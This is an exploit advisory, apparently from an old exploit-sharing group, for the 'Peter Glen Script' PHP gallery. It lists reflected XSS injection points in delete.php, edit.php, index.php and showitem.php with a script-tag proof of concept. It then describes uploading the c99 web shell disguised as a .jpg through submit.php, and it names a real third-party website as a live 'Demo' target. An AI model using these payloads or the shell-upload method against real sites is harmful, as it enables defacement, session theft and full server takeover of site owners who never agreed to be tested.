______     __     ______             
               /\  == \   /\ \   /\  __ \   
               \ \  __<   \ \ \  \ \ \/\ \  
                \ \_____\  \ \_\  \ \_____\ 
                 \/_____/   \/_/   \/_____/ 
				 
                 01000010 01101001 01001111      

[#]----------------------------------------------------------------[#]
# 
# [x] Peter Glen Script [XSS/Shell Upload]
# [x] Author: bi0
# [x] Contact: bukibv@hotmail.com	
# [x] Homepage : www.ssteam.ws
# [x] Thanks: packetdeath and ssteam.ws
#  
[#]-------------------------------------------------------------------------------------------[#]
#
# [x] Exploit : 
#
# [XSS] 
#    http://localhost/gallery/delete.php?item=[XSS]
#    http://localhost/gallery/edit.php?item=[XSS]
#    http://localhost/gallery/index.php?next=[XSS]
#    http://localhost/gallery/showitem.php?item=[XSS]
#
# [x] Poc : 
#    
#   http://localhost/gallery/delete.php?item="/><script>alert('XSS')</script>
#   
# [Shell Upload]
#   
#   http://localhost/gallery/gallery/submit.php
#   and upload shell in jpg format ex : c99.php.jpg
#
[#]------------------------------------------------------------------------------------------[#]
#
#  Demo : 
# 
#  [+] http://siestadrumcircle.com/gallery/
#  
#  
[#]-------------------------------------------------------------------------------------------[#]

#EOF